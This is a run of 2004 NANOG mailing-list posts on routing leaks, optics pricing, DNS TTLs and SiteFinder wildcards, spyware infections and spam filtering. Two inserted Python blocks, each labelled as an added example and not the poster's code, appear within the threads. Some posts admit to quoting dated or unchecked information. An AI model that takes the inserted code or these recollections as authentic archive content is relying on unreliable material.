France Telecom... On Fri, 19 Nov 2004, Vandy Hamidi wrote: Problem is fixed. Looks like a quick patch was put into place. Who is opentransit.net? 3 5 ms 5 ms 5 ms sl-gw27-stk-4-4-TS5.sprintlink.net [144.228.107. 4 5 ms 5 ms 5 ms sl-bb21-stk-9-0.sprintlink.net [144.232.4.245] 5 8 ms 8 ms 8 ms sl-bb24-sj-9-0.sprintlink.net [144.232.20.181] 6 9 ms 9 ms 9 ms sl-st21-pa-15-1.sprintlink.net [144.232.20.40] 7 9 ms 9 ms 9 ms sl-franc2-6-0.sprintlink.net [144.223.243.82] 8 9 ms 9 ms 14 ms Google-EU-Customers.GW.opentransit.net [193.251. 9 10 ms 10 ms 10 ms 216.239.48.174 10 11 ms 10 ms 11 ms 216.239.48.214 11 19 ms 16 ms 11 ms 216.239.48.210 12 11 ms 10 ms 10 ms 216.239.49.168 13 11 ms 12 ms 11 ms 216.239.49.2 14 10 ms 19 ms 16 ms 216.239.57.99 Trace complete. H:\ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul G Sent: Friday, November 19, 2004 2:43 PM To: [EMAIL PROTECTED] Subject: Re: Goofle/Sprint having problems? - Original Message - From: Sean Donelan [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 19, 2004 5:38 PM Subject: RE: Goofle/Sprint having problems? On Fri, 19 Nov 2004, Vandy Hamidi wrote: Yeah, a visual route just showed my trace going to AUS and then Singapore. Hmm... You think Google is going to be pissed when they find out their site was being routed to Asia? Heads will roll... (lawsuit?) NANOG recurring topic thread #4 Gee, maybe there should be a registry of authorized routes and who they belong to that ISPs could check. We could even call it the Internet Routing Registry. ... and we could then make fun of those few (sic/sar) that don't filter based on that data on a mailing list we could call nanog-l. paul --- paul galynin
Cisco 6509 DC Power Supplies...
I have 2 6500 DC Power Supplies I don't need anymore. They are FREE to a good home! I'd prefer someone to just pick them up locally to me, they are in the Ashburn Equinix facility. If anyone is interested, drop me a line. They are pretty much brand new and work fine, they are not for shooting or blowing up (although I have an old switch if you are looking for something to destroy).

Thank You,
Brian W. Gemberling
Re: Okay, I'm just going to _assume_...
It's official - pigs are aloft, the forecast for Hell is freezing rain, the Sox have nearly broken the Curse (and will... :), and Cisco has taken over Looney Tunes. The end is near. No, no operational content... Did John Chambers have an aneurysm recently?

On Thu, 21 Oct 2004, Bill Woodcock wrote:
:
:...that there's some operational content somewhere in here:
:
:http://www.cisco.com/edu/peterpacket/
:
:...though I'm on kind of a slow link, so I'm still looking. My eternal
:thanks to Suresh for finding this. My day is complete.
:
:-Bill
Re: FW: The worst abuse e-mail ever, sverige.net
:Let's put this in perspective. Say a hypothetical sysadmin were to
:disable any and all authentication on his SSH server. And that
:someone then used SSH from your network to run code that sysadmin
:didn't like on that machine. Would you then consider it reasonable if
:the sysadmin proposed:
:
: The only responsible thing to do is filter port 22, smarthost for
: your users, and inform them about using the alternate submission
: port with authenticated SSH in order to work with enterprise SSH
: servers - or IPSec VPNs, for that matter. This is simply the best
: practice, at this point in time.
:

Apples oranges; thanks for playing, please try again...
Lucent/Ascend/Cascade B-STDX images
I've exhausted all my resources, and have not found a definitive method for upgrading a production switch from cp40 to cp50. Is it as simple as hot-swapping the standby, ignoring the capability mismatch, changing the active cp, then doing the same for the master cp? Also, curious if the images for these blades are interchangeable. Any input would be most appreciated. cheers, brian
Re: Hurricane Frances impacts
:The networks in Broward, Palm Beach, Martin, Brevard counties appear to
:be the most impacted. Cellular had problems due to wireless sites being
:without power. The wireless industry brought in 500 new generators in
:advance of the hurricane, but needed to wait until the hurricane passed
:before sending them out to the cell sites. Miami and Orlando also have
:sites down due to power issues and connectivity to local carriers.
:
:The various local access line providers in Florida, Florida has a lot of
:tiny LATAs and phone companies, report some access lines are down but
:haven't published any counts. Cable networks have the same issues with
:local cable service. No reports of damage to telephone central offices or
:cable headends.
:
:Due to power outages and local access network problems, bank networks and
:cash machines are out of service in most of the affected counties.
:
:No reports of problems to any NAPs, POPs, data centers or fiber trunks.
:They generally have permanent generators. So if you have local
:connectivity, Internet access is working. Streaming audio/video from
:Florida television and radio stations over the Internet did not have any
:problems.

Any details on the status of natural gas lines in FL, and approximately how many facilities use such for generator power vs diesel?
RE: Senator Diane Feinstein Wants to know about the Benefits of P 2P
Akamai or not, microsoft is overwhelmed by the demand for SP2, and today is giving the message listed below on windowsupdate:

Download and install it now - Currently not available
We are currently experiencing a high level of demand for Windows XP Service Pack 2, so please check back later for availability. We apologize for any inconvenience. If you prefer to obtain SP2 another way, the easiest way to get Service Pack 2 is to turn on the Automatic Updates feature in Windows XP and it will be downloaded when you are connected to the Internet without you having to take any further action.

So then I thought about getting it from the torrent at sp2torrent.com, but sadly microsoft has made them remove the torrent...

-Original Message-
From: Byron L. Hicks [mailto:[EMAIL PROTECTED]
Sent: Monday, August 30, 2004 3:21 PM
To: Jeff Wheeler; Henry Linneweh
Cc: [EMAIL PROTECTED]
Subject: Re: Senator Diane Feinstein Wants to know about the Benefits of P2P

Not true. For those of us who host Akamai servers, we could download SP2 with no problems. We did not need P2P, or MSDN. In fact, I would be very reluctant to trust a Windows update downloaded via P2P.

--
Byron L. Hicks
Network Engineer
NMSU ICT

On 8/30/04 12:43 PM, Jeff Wheeler [EMAIL PROTECTED] wrote:

My two cents: When Windows XP SP2 was released the only way to get it (for those of us not part of MSDN at least) was via P2P. The same has been true for countless other large but important software releases on various platforms (particularly ones like Linux that aren't backed by huge corporations with tons of bandwidth to host these sorts of files). Point is? P2P is extremely valuable for the timely and cost-effective delivery of critical updates to the masses.

--
Jeff Wheeler
Postmaster, Network Admin
US Institute of Peace

On Aug 30, 2004, at 2:27 PM, Henry Linneweh wrote:

So I would like some professional expert opinion to give her on this issue since it will affect the copyright inducement bill.
Real benefits for production and professional usage of this technology.
-Henry
Re: optics pricing (Re: Weird GigE Media Converter Behavior)
Actually, (and this is from memory from a couple of years ago), most of the reason for cost of optics on 10G interfaces is simply *physics* (and the technology of component production at the current state-of-the-art level). (If any of the people questioning the pricing had bothered to look into *cost* (you know, that input thing before mark-up), or done any reading (and light reading doesn't count ;-)), you'd already know the reasons.)

What it boils down to, is that the way solid-state on-chip lasers are made, for 1.0 GHz (really 933 MHz, IIRC), or even 2.5 GHz, fundamentally doesn't work for 10Ghz. It's because they are *lasers*, where component accuracy is really critical, and at 10Ghz, it crosses a threshold that likely won't be solved until someone clever invents some new way of doing things, or until nanotech becomes nanotech (without the quotes).

And the VSR 10G, is really a misnomer. What it is, is 10 x 1.25 GHz parallel interface with fibre-optic ribbon cables. The 10 is so they can build in some hardware redundancy in case of failure, and also to improve the yields and infant mortality rates on production of the chips. Basically, 1.25 GHz (or maybe it's 1.125? It's been too long) are easy to do, with current-generation chip-production technology.

10Ghz optics are old-school lasers, several orders of magnitude larger, much more power-hungry, delicate, and in all likelihood, hand-crafted with low yields. They really are that expensive. Just check out the price on 10G transponders (eg DWDM equipment) if you don't believe that's the case...

On the other hand, it'd be nice to see a copper 10GBIC, even if its max cable length were a few metres. ;-)

Keep in mind, I'm following standard NANOG methodology and quoting old information without checking my facts against current reality. :-) Your mileage (or cost) may vary, as they say.

--
Brian Dickson
Arbinet
RE: optics pricing (Re: Weird GigE Media Converter Behavior)
Aha. It appears I was correct in framing my knowledge as out-of-date. :-) It looks like the technology *has* advanced, and that 10GE on MMF or SMF, single-channel, is what the current state of the art is, and at the $2k-3k unit price. In which case, yes, not offering this (and not building cards to use cheaper and/or more flexible component, ie XENPAK), is likely going to be a huge mistake Cisco. Unless they bite the bullet and do whatever it takes to make xenpak-based 10G cards, on at least some flavour of card on any 10G platform. (I don't really expect a xenpak-compatible version of soho routers to show up, although it *would* be nice as an option on most of their switch families.) So, I sit corrected. ;-)

BTW, thanks for pointing this out; it's nice to see that things haven't completely stagnated in the last couple of years.

Brian

P.S. At that price level, I actually *do* expect another Swede will have, or already has, one or more of this class of box at home. In his WC, even. ;-)

P.P.S. He's not crazy. But he *should* have a t-shirt that says I'm with STUPI. ;-)

-Original Message-
From: Mikael Abrahamsson [mailto:[EMAIL PROTECTED]]
Sent: Sunday, August 29, 2004 12:08 PM
To: Dickson, Brian
Cc: [EMAIL PROTECTED]
Subject: Re: optics pricing (Re: Weird GigE Media Converter Behavior)

Then why can I purchase 10km 10GE Xenpaks directly from the manufacturer for under $2000?

On the other hand, it'd be nice to see a copper 10GBIC, even if its max cable length were a few metres. ;-)

There is one. It's called CX4 and has a reach of 15 meters. Cisco sold it for $600 list price at first but it has now disappeared from the price list. I don't know why.
http://www.cisco.com/en/US/products/hw/modules/ps4835/products_data_sheet09186a008007cd00.html

--
Mikael Abrahamsson email: [EMAIL PROTECTED]
verizon postmaster contact?
Can someone with verizon mail/postmaster group get in touch with me. thanks, - bri -- Recursivity. Call back if it happens again.
RESOLVED, was Re: problems accessing 128.171.*
Cheers to everyone who mailed me, apparently was a pccwbtn and/or alter.net issue. Now resolved.

thanks,
- bri

At Mon, Aug 02, 2004 at 05:56:04PM -0400, Brian Russo wrote:
Is anyone else having problems accessing 128.171.* (hawaii.edu)
- bri

--
Recursivity. Call back if it happens again.
Re: 2511 line break
(Ob Humor: I read nanog via the web-based archive. Randy doesn't have a .signature. I *was* going to google for his email. Such irony, timing.)

IIRC, 2511's look the same as the aux on any Cisco box. For those, it is CTRL-caret x, where caret is '^', shift-6 on most western keyboards. Be careful not to just hit return next, since that is continue to telnet, defeating your correct break sequence's intentions.

briand
RE: VeriSign's rapid DNS updates in .com/.net
Petri Helenius wrote: What would be your suggestion to achieve the desired effect that many seek by lower TTL's, which is changing A records to point to available, lower load servers at different times? On a similar note (and not viewing the issue through the usual spam-colored glasses): Some people are using low dns TTLs in disaster recovery setups, so that in the event of a disaster at a primary site, services can be switched over to new servers at a secondary site via easy and fast DNS changes? If the TTLs are too long, all the cached records will continue to point at the servers which might no longer exist -- until they expire. This is another situation where low TTLs can be beneficial. Are there any other uses for low dns TTLs that haven't been brought up in this thread? And what is a low TTL being classified as? 30 minutes? 10 minutes? 5 minutes? -Brian
RE: Spyware becomes increasingly malicious
Alexei Roudnev wrote:

It is not a bug; it is specially designed IE feature. MS always was proud of their full automation - install on demand, update automatically, add new software to start at a startup without need to be system admin, etc etc... As a result, we have a field full of bugs, pests, pets, spiders, spies and so on... They have _exactly_ what they designed. No one even bothered to ask me 'do you want to allow this registry change', because 'MS believe that their users are lamers so everything must be automated from the beginning to the end'...

Most of the latest versions appear to install themselves using the ByteCode Verifier vulnerability in the Microsoft Virtual Machine. Fully patched systems don't get the stuff installed. I'm sure the authors are working on newer injection methods. Though the blame might be placed on Microsoft for having a flaw in their code, this wasn't part of any IE feature. You can read more about this exploitable bug (not feature) at http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx

I do not blame MS, but what about spyware on Macs - is it so easy to write and install spyware there?

I don't really want to get into the argument of why people choose microsoft products to attack, but if someone was going to choose a product to attack, from which they were going to try and make the most money/impact off of, do you think they would choose the product with the largest user base? I think that's the case here. It would be a poor business decision not to, and these people are definitely out to make as much money as they can off of these exploits.

This is 100% legal at this point (and even if it is not legal, who bothers about it outside of the USA? No one!).

It really shouldn't be legal. It is someone gaining unauthorized access to computer systems and altering data on those machines. Not to mention that people are profiting from these intrusions.

-Brian
RE: Spyware becomes increasingly malicious
William Warren wrote: not all the variants are that easy..how about doing a google on coolwebsearch..scumware.com has a good writeup as well as spywareinfo.com...the newer variants are not that easy I second that. The version I saw required a third party registry editor and booting up into the recovery console from an XP cd (safe mode didn't cut it) just to remove a hidden dll. Had it not been for the forums out there at http://forums.spywareinfo.com and the cwsshredder, which got most, but not all, of the cruft installed by this piece of bastard software, my grandmother's computer would still be popping up those tens of pages of garbage randomly. The authors of these coolwebsearch variants are extremely intelligent programmers with far more understanding of the bowels of the windows platform than your average script kiddies. If you get hit with the version I saw, it's no 10 minute piece of cake. What I don't understand is how exploiting bugs in a program (internet explorer) to install software without the consent or even acknowledgement from the owner/user is legal behavior. To me, it's just like someone abusing a bug in bind, and installing a rootkit, which last time I checked, could end up getting someone in legal troubles. For another hastily-thought-out analogy, it's like someone breaking into your house and reprogramming your cable box to keep changing the channel to the home shopping club every 30 seconds. -Brian
RE: (UPDATE) Can a Customer take their IP's with them? (Court says yes!)
On Tue, 29 Jun 2004, David Schwartz wrote:
:
: : What I AM looking for is a commentary from the internet community,
: : strictly relating to the fact that a judge has issued a TRO that forces an
: : ISP (NAC) to allow a third-party, who WILL NOT be a Customer of NAC, to be
: : able to use IP Space allocated to NAC. In other words, I am asking people
: : to if they agree with my position, lawsuit or not, that non-portable IP's
: : should not be portable between parties, especially by a state superior
: : court ordered TRO.
:
: It is at least my opinion that this is a ludicrous argument. While this
:would certainly cause problems if everyone did it and it isn't the norm,
:it's ridiculous to argue that there could never exist a situation where this
:might not be the best temporary solution to a legitimate dispute between
:parties.
:
: Consider, for example, if I'm a large customer single-homed to one ISP.
:They go out of business and can't continue to provide me with service with
:four hours notice.

Consider Randy's earlier recollection, which many should also recall. In the context of the currently publicly available documents, any further discussion is less than operationally relevant.

cheers,
brian
Re: Attn MCI/UUNet - Massive abuse from your network
Is it possible for some people to chime in on backbone scaling issues that have a linksys cable modem router to test on? On Thu, 24 Jun 2004, Robert E. Seastrom wrote: Dr. Jeffrey Race [EMAIL PROTECTED] writes: Poof! MCI spam problem goes away in 30 days. http://www.rhyolite.com/anti-spam/you-might-be.html I think the discussion is over. ---Rob
Re: Verisign vs. ICANN
Stephen J. Wilcox (SJW) wrote:

SJW I do not believe there is any technical spec prohibiting this,
SJW in fact that DNS can use a wildcard at any level is what enables
SJW the facility.

It is not always the case that everything a spec defines, is included or enumerated in the spec, particularly when specs refer to other specs and it is the combination(s) of specs which define proper behaviour. (If every protocol which was built on TCP, had to also include the contents of the TCP spec, the whole RFC system would quickly collapse under its own weight.)

SJW I think this is a non-technical argument..
SJW altho it was demonstrated that owing to the age and status of the com/net
SJW zones a number of systems are now in operation which make
SJW assumptions about the response in the event of the domain not existing...

If it were merely an *internal* issue *within* the DNS system, perhaps there would be areas of disagreement which could be settled via either extending, or clarifying, the relevant RFCs. However, the issue is, to some degree, actually outside of the proper scope of the DNS lookup/resolver system. (see below...)

On Sat, 19 Jun 2004, Alexei Roudnev (AR) wrote:

AR The technical roots of the problem are: proposed services VIOLATES
AR internet specification (which is 100% clean - if name do not exist,
AR resolver must receive negative response).
AR So, technically, there is not any ground for SiteFinder - vice versa

To make Alexei's argument's syntax agree with the intended semantics: He means to say, Technically, there are no grounds for implementing SiteFinder by means of inserting wildcards to the .com and .net zones. Rather, there are specific grounds for *not* inserting wildcards, regardless of the purpose of those wildcards, in .net and .com zones.

(E.g.: in contrast with .museum zone, which is generally special-purpose, and for which assumptions about which services are expected (www only) are reasonable and valid, the .com and .net zone are general-purpose, and pretty much any service, including all assigned values for TCP and UDP ports from the IANA, should and must be presumed to be used across the collection of IPv4 space.)

The crux of the problem appears in a particular case, for which *no* workaround exists, and for which no workaround *can* exist, from a straight derivational logic of state-machine origins.

The DNS *resolver* system, is only one of the places where the global namespace is *implemented*. Any assigned DNS name *may* be placed into the DNS. And *only* the owner of that name has authority to register that name, or cause its value to return from any query. An assigned name, however, can *also*, or even *instead* of being placed into the DNS *resolver* system, be put into other systems for resolving and returning name-address mappings. These include:

* the predecessor to BIND, which is the archaic /etc/hosts file(s) on systems;
* Sun's NIS or NIS+ systems (local to any NIS/NIS+ domain space);
* LDAP and similar systems;
* X.500 (if this is by any chance distinct from LDAP - I'm no expert on either);
* and any other arbitrary system for implementing name-address lookups.

And the primary reason for *REQUIRING* NXDOMAIN results in DNS, is that in any host system which queries multiple sources, only a negative response on a lookup will allow the search to continue to the next system in the search order. Implementing root-zone wildcards, places restrictions on both search-order, and content population, of respective name-resolution systems, which violates any combination of RFCs and best-common practices. And, most importantly, *cannot* be worked around, *period*.

Until the RFCs are extended to permit population of zones with authoritative *negative* information, and all the servers and resolvers implement support for such, *and* operators of root zone databases automatically populate assigned zones with such negative values, wildcards *will* break, in irreconcilable fashion, existing, deployed systems which refer to multiple implementations of zone information services, and for which *no* workaround is possible.

Apologies for a long, semi-on-topic post. Hopefully this will end this thread, and maybe even put a stake through the heart of the VeriSign filing (at least this version of it). While the law generally doesn't recognize mathematically excluded things as a matter of law, when it comes to affirmative testimony, counter-arguments can demonstrably be shown as de-facto perjury.

Brian Dickson
(who has had to deploy systems in heterogeneous environments, and is aware of deployed systems that broke because of *.com)
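The multi-source lookup argument above, as an added Python model that is not Brian's code or anything posted in the thread: a host with a "dns nis" search order, where the .com zone contents, the internal NIS-only host and the 192.0.2.1 wildcard target are all constructed sample data.

```python
"""Name-service search order vs. a TLD wildcard.

Added example for the post above (not the author's code): a toy model of a
host that consults several name sources in order, nsswitch-style, where a
negative answer from one source is what lets the search fall through to the
next. All zones, names and addresses below are constructed sample data.
"""

NXDOMAIN = None  # sentinel: "this source has no record for the name"


class HostsFile:
    """Flat name -> address map, like /etc/hosts (constructed sample)."""

    def __init__(self, entries):
        self.entries = dict(entries)

    def lookup(self, name):
        return self.entries.get(name, NXDOMAIN)


class NisMap(HostsFile):
    """Site-local map such as NIS/NIS+ hosts.byname; same behaviour here."""


class DnsZone:
    """Authoritative data for one zone. With `wildcard` set, every name under
    the zone that has no explicit record gets the wildcard address instead
    of a negative answer, which is the SiteFinder-style behaviour at issue."""

    def __init__(self, suffix, records, wildcard=None):
        self.suffix = suffix
        self.records = dict(records)
        self.wildcard = wildcard

    def lookup(self, name):
        if not name.endswith(self.suffix):
            return NXDOMAIN  # not our zone: negative, so the search continues
        if name in self.records:
            return self.records[name]
        return self.wildcard if self.wildcard is not None else NXDOMAIN


def resolve(name, search_order):
    """Walk the sources in order and return (address, source_name).

    Only a negative answer lets the search continue; the first positive
    answer ends it, whether or not it is the one the operator intended.
    Returns (NXDOMAIN, None) when every source is negative."""
    for source in search_order:
        answer = source.lookup(name)
        if answer is not NXDOMAIN:
            return answer, type(source).__name__
    return NXDOMAIN, None


def scenario(wildcard):
    """Resolve three names with a 'dns nis' search order.

    payroll.example.com is registered under .com but deliberately published
    only in the site's NIS map, a common pattern for internal hosts.
    Returns {name: (address, source)} for inspection."""
    com = DnsZone(".com", {"www.example.com": "203.0.113.10"},
                  wildcard=wildcard)
    nis = NisMap({"payroll.example.com": "10.0.0.5"})
    order = [com, nis]
    names = ("www.example.com", "payroll.example.com", "no-such.example.com")
    return {n: resolve(n, order) for n in names}


if __name__ == "__main__":
    print("without wildcard:", scenario(None))
    # 192.0.2.1 is a constructed stand-in for the wildcard target address
    print("with wildcard:   ", scenario("192.0.2.1"))
```

With the wildcard in place the NIS-only host never gets resolved and a non-existent name never produces a negative answer, which is exactly the fall-through breakage the post describes.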
Re: Akamai an Inside Job?
At 08:23 AM 6/16/2004, David Kennedy CISSP wrote: http://www.overclockersclub.com/?read=8733819 The Akamai attacks started in the morning and it was detected by Keynote Systems, a web tracking company that is able to track the load and bandwidth on the Internet. According to Keynote they saw an Internet performance issue this morning Keynote's primary business model is measuring the performance and availability of public web sites as seen from a distributed network of synthetic probes. They don't offer any services that track the load and bandwidth on the Internet. Here's what their public/PR type email alert said on the matter yesterday: Keynote Internet Performance Alert Starting at approximately 5:30am PDT today, a major Internet performance issue was detected by Keynote systems. By 6:00am, the availability of the Keynote Business 40 Internet Performance Index had dropped from its usual near-100% availability to 81% availability: http://keynote.lyris.net/t/4086/732513/23/0/http://web507.keynote.com/mykeynote/Post/KB40data_061504_085844.asp Further analysis by Keynote indicated that the availability issues were limited to several large sites, all of whom outsource their DNS services to Akamai. These sites dropped to near-zero availability: http://keynote.lyris.net/t/4086/732513/24/0/http://web507.keynote.com/mykeynote/Post/KB40data_061504_090509.asp Availability was largely restored by approximately 7:45am PDT. ... They have tracked the attacker back to person that is at the Akamai Technologies ISP. No other information has been given to us at this time. We do not know if the FBI is working on this issue right now, but we expect them to do so. [DMK: Source, beyond overclockers, unknown, reliability and accuracy unknown.] That's nonsense David. Keynote measurements can distinguish between availability problems caused by DNS outages versus those caused by connectivity or site outages. They manifestly don't track attackers. Brian Mulvaney
[OT] common list sense (Re: Even you can be hacked)
Paul Jamka [PJ] wrote:
On Thu, 10 Jun 2004, Laurence F. Sheldon, Jr. [LFSJ] wrote:
LFSJ I'm on the list folks, if you send it to the list I'll get it. I don't need a copy to the list and Cc:'s until the end of time.
PJ Then set a Reply-To. Pretty simple.

In case no one else bothered to point this out: Not everyone who *posts* to NANOG *reads* nanog via email. For example, I read it via the web archive. For those like us, any presumption about replies to the list being read by us, would be incorrect. And since no one necessarily knows the current subscription status of everyone else, it actually makes sense to copy both the sender and the list. As Randy [Bush, of course] points out, if you don't like duplicate mail, you are free to use some kind of filter.

(Please don't bother replying. I am just attempting to get in the last blow before the equine perishes.)

Brian
RE: Barracuda Networks Spam Firewall
Eric,

There's one rule that will wipe out ~90% of spam, but nobody seems to have written it yet.

if URL IP addr is in China then score=100

support for a generic lookup list of cidr blocks would get another 9%

I agree that geographically classifying the URLs embedded in the spams would be pretty slick, using the china.blackholes.us and cn-kr.blackholes.us RBLs has been pretty effective at reducing our spamload, as a supplement to the standard lookup services. They do not discriminate between legit mails and spam mails from china. Everything from those IP blocks gets classified as spam. Luckily we don't ever get any client emails from those countries at this point and can use these filters without worrying about false-positives. (I think the doubleclick.blackholes.us is pretty funny too) There are others at: http://www.blackholes.us/

Is anyone else out there using these blackholes? I wonder how often they get updated.

Brian Battle
Confluence
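The proposed rule as an added Python sketch, not Barracuda's rule engine or the poster's code: it assumes a constructed host-to-address table in place of DNS and the documentation range 203.0.113.0/24 as the blocked CIDR list, and its third sample message shows the false positive the post warns about.

```python
"""Score a mail by the network location of the hosts in its embedded URLs.

Added example for the Barracuda rule discussed above (not Barracuda's or the
poster's code): URLs are pulled from the body, each host is mapped to an
address, and a message scores 100 if any address falls inside a blocked CIDR
list. The block list, the host -> address table and the sample messages are
all constructed; the table stands in for DNS so the example runs offline.
"""
import ipaddress
import re

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed stand-in for a DNS lookup (documentation-only addresses).
FAKE_DNS = {
    "shop.example": "198.51.100.7",
    "cheap-pills.example": "203.0.113.42",
    "partner.example": "203.0.113.200",
}

# Constructed "generic lookup list of cidr blocks"; 203.0.113.0/24 plays the
# role of a blocked country allocation. A real list would be loaded from a file.
BLOCKED_CIDRS = [ipaddress.ip_network("203.0.113.0/24")]
BLOCK_SCORE = 100


def url_hosts(body):
    """Return the distinct, lower-cased hostnames of URLs found in the body."""
    return sorted({m.group(1).lower() for m in URL_HOST_RE.finditer(body)})


def host_in_blocked_cidr(host, resolver=FAKE_DNS, cidrs=BLOCKED_CIDRS):
    """True if the host's address lies inside any blocked block.

    Unresolvable hosts count as not blocked, so a lookup failure never
    fires the rule on its own."""
    addr = resolver.get(host)
    if addr is None:
        return False
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in cidrs)


def score_message(body, resolver=FAKE_DNS, cidrs=BLOCKED_CIDRS):
    """Return (score, hits): BLOCK_SCORE if any URL host is inside a blocked
    block, else 0; hits lists the hosts that triggered the rule."""
    hits = [h for h in url_hosts(body)
            if host_in_blocked_cidr(h, resolver, cidrs)]
    return (BLOCK_SCORE if hits else 0), hits


# Constructed sample messages.
SPAM = "Cheap meds, no prescription! Visit http://CHEAP-PILLS.example/buy now"
LEGIT = "Your order shipped. Track it at https://shop.example/track?id=123"
# Legitimate mail whose link lands in the blocked range: the rule cannot tell
# it apart from spam, which is the false-positive caveat raised in the post.
LEGIT_FROM_BLOCKED_RANGE = "Slides from the meeting: http://partner.example/deck.pdf"

if __name__ == "__main__":
    for label, body in (("spam", SPAM), ("legit", LEGIT),
                        ("partner", LEGIT_FROM_BLOCKED_RANGE)):
        print(label, score_message(body))
```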
RE: Network discovery tools
The best GPL tool that I've come across in a long while, as far as network discovery goes, would have to be the discovery engine inside Netdisco (http://www.netdisco.org). This tool is fairly Cisco-centric, but Max has put a lot of work into a tool for folks who are tired of CiscoWorks not working. -B -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Thursday, May 06, 2004 11:13 AM To: [EMAIL PROTECTED] Subject: Network discovery tools I was wondering if anyone could recommend a good shareware or demo network discovery tool. I was hoping to find something that will show vendor type during node discovery. I came across a tool called network ferret that did the job, but nothing downloadable. I'm hoping to do some more work on the effects of network diversity, and wanted to do testing on real world networks. I figured starting of with GMU would get us going, but if anyone knows of any available datasets with node-link topology and vendor type it would be great to play with them. thanks, sean
Re: Mexico City Internet Bandwidth suggestions
Paul,

If we were to take a rough poll, which one of the two, Alestra or Avantel, would get the prize for highest uptime/availability?

Sorry for the delay. I installed the network as a consultant 3 or so years ago. My client's Operations staff have been extremely competent in handling it since then, so I haven't had to be involved since then. I've asked them for their input, and this is their response ...

Alestra has better uptime and is better for national (Mexico) routes. Avantel has better international (especially USA) routes.

Hope that helps,
Brian
Re: Mexico City Internet Bandwidth suggestions
I was curious if anyone could share any suggestions and experiences with providers of internet bandwidth ranging from T1 to OC3 in Mexico City. Telmex is the obvious in-house Mexico monopoly, but was wondering if there were any other legitimate, competitive providers in the game over there. Alestra (affiliated in some way with ATT), and Avantel (affiliated in some way with Worldcom) gave us reasonable pricing (reasonable for Mexico City anyway) on E3/T3 solutions. A couple years ago they were peered with Telmex in Monterrey I think, which was acceptable given the difference in pricing (Telmex and GBLX were both *much* costlier). We got an uplink to both and run bgp. It's been fairly solid. When one's down, the other's up :) Brian
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 06:12:16AM -0400, Chris Brenton wrote: Key word here is essentially. I've been involved with about a half dozen compromises that have been true zero days. Granted that's less than ground noise compared to what we are seeing today. There're a lot more 0-days than that. They just tend to remain within a smaller community (typically the ones who discover it) and are used carefully/intelligently for compromises, often for a very long time. Then it gets leaked by someone and released into the wild/script kiddie community or someone else discovers it... (more for benefit of others than a response to you) Also, don't underestimate a person's ability to shoot themselves in the foot. Windows 2003 server, out of the box, is technically one of the most secure operating systems out there because it ships with no open listening ports. Based on the auditing I've done however, it ends up being deployed even less secure than 2000 because a lot of admins end up doing the turn everything on to get it working thing. An uneducated end user is not something you can fix with a service pack. Agreed, and even conscientious users screw up. I did this some months ago when installing MS SQL Server Desktop Engine from a third-party CD (packaged with software). This was well after the whole Slammer affair, memories fade and I didn't stop to realize they used the same codebase (oops) - bri
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 08:22:48AM -0400, Chris Brenton wrote:

Agreed. I think part of what makes 0-day easier to hide *is* the raw quantity of preventable exploits that are taking place. In many ways we have become numb to compromises so that the first response ends up being format and start over. If 0-day was a higher percentage, it would be easier to catch them when they occur and do a proper forensic analysis.

Right, they fit in with the noise.

RANT

I guess I have a hard time blaming this type of thing on the end user. Part of the fall out from making computers easier to use, is making it easier for end users to shoot themselves in the foot. One of the benefits of complexity is that it forces end user education. I'm guessing that if you had to load SQL as a dependency you would have caught your mistake before you made it.

Let me give you an example of the easy to use interface thing. Back in 2000 I made it a personal goal to try and get the top 5 SMURF amplifier sites shut down. I did some research to figure out what net blocks were being used and started contacting the admins. Imagine my surprise when I found out that 3 of the 5 _had_ a firewall. They had clicked their way through configuring Firewall-1, didn't know they needed to tweak the default property settings, and were letting through all ICMP unrestricted and unlogged.

IMHO it's only getting worse. I teach a lot of perimeter security folks and it seems like more and more of them are moving up the ranks without ever seeing a command prompt. I actually had one guy argue that everything in Windows is point and click and if you could not use a mouse to do something, it was not worth doing.

Again, I don't see this as an end user problem because as an industry we've tried to make security seem easier than it actually is. We want to make it like driving a car when it's more like flying an airplane.

That's pretty sad, I can forgive users, but nobody doing 'security' should be living in a pure GUI world, to extend your analogy it would be like only knowing how to configure the autopilot and getting a pilot's license.

As far as mainstream users..

* Software needs to patch itself, users aren't going to do it.
* Software needs to be intuitive, people interact with computers as if they were doing 'real' things. Things like cut and paste are easy because they make sense...
* Software patches need to WORK and not screw up Joe User's system, believe me they won't understand that software is never bug-free, they'll instead swear off installing patches in future.
* Software needs reasonable defaults.. this doesn't necessarily mean turning every feature off.
* Wizards and/or a choice of 'starter' confs can be great.
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 11:22:17PM +1000, Gregh wrote:

I would love to know the average age of the list inhabitants.

22

It has been my observation that things which are new become better known when a generation has grown up, completely, with it and is teaching the next generation. Until that occurs, you are going to get one heck of a larger lot of uninformed users because they are not only young and clueless but every other age and clueless. Worse, they are clueless in a lot of cases because they are frightened by new technology. Eventually, it will become as common as a car on the road and at that point, taking obvious steps won't even be a topic for discussion any longer.

Of course you're right, but this isn't going to happen for a long time.. and besides.. there are a lot of people in my generation that are not that tech-savvy at all.. I'd say the top uses are Games, IM/blogs/etc and P2P. None of these really have anything to do with being good guardians of the net. Of course in the long run you'll prove me wrong.. but I think it'll take a fair while yet.. anyway, I just hope we'll have made good progress on other fronts.

- bri
Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

I just received this. I would like to check if others have received it and did it indeed come through nanog mailist:

Date: Wed, 17 Mar 2004 21:10:38 +
From: Deep Throat [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Spamhaus Exposed

Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

___

